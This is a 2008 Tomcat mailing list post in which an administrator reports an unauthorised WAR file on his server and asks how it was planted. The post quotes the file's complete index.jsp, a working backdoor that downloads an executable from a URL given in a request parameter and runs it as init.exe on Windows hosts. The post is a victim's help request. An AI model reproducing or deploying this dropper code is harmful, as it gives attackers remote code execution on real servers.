tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Warren Bell <war...@clarksnutrition.com>
Subject Possible virus uploaded to Tomcat 5.5.3
Date Fri, 08 Aug 2008 18:17:51 GMT
I have found a war file on my server that appeared around July 14. I am 
the only one that has access to this machine and I did not put it there. 
It consists of a jsp that downloads a program named init.exe and then 
executes it. This server is on a private network. Though there are three 
pc kiosks in grocery stores that are available to the public that access 
this server but they are on a different subnet and only have access to 
the server thru port 8080. I am pretty sure it came from one of these 
stores. The url used for this program is .../fexcep/index.jsp?url=... I 
am running Tomcat 5.5.3 on Windows XP.

How did somebody get this war file onto my server ?

Here is the code of index.jsp:

<%@ page language="java" pageEncoding="utf-8" 
import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>
<%!
    String sys=null;
       
public class AutoKill {
   
    private boolean downFile(String url,String filesrc)
    {
        try
        {
        URL urlc = new URL(url);
        HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
        con.connect();
        byte[] b=new byte[1024];
        BufferedInputStream bis=new 
BufferedInputStream(con.getInputStream());
        FileOutputStream fos=new FileOutputStream(filesrc);
        int length=-1;
        while((length=bis.read(b,0,b.length))!=-1)
        {
            fos.write(b,0,length);
        }
        fos.close();
        bis.close();
        return true;
        }catch(Exception e)
        {
        e.printStackTrace();   
        }
        return false;
    }
}

%>
<%
        sys=System.getProperty("os.name");
        int i=sys.indexOf("Windows");
        AutoKill ak=new AutoKill();
        if(i>-1)
        {
            String result;
            try
            {
                String url=request.getParameter("userurl");
                System.out.println(url);
                String 
filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
                if (ak.downFile(url,filesrc) )
                {
                    Process run_proc=Runtime.getRuntime().exec(filesrc);
                    result="Success! ";
                }
                else
                {
                    result="Failure! Down File Failure!";
                }

            }catch(Exception e)
            {
                result="Failure!throws Exception - "+e.getMessage()+"! ";
            }
            request.setAttribute("result",result);
        }
        else
        {
            request.setAttribute("result","Failure!Because Remote 
computer system is "+sys+"!");
        }
               
        request.getRequestDispatcher("/ok.jsp").forward(request, response);
 %>





-- 
Thanks,

Warren Bell
909-645-8864
warren@clarksnutrition.com


---------------------------------------------------------------------
To start a new topic, e-mail: users@tomcat.apache.org
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org


Mime
View raw message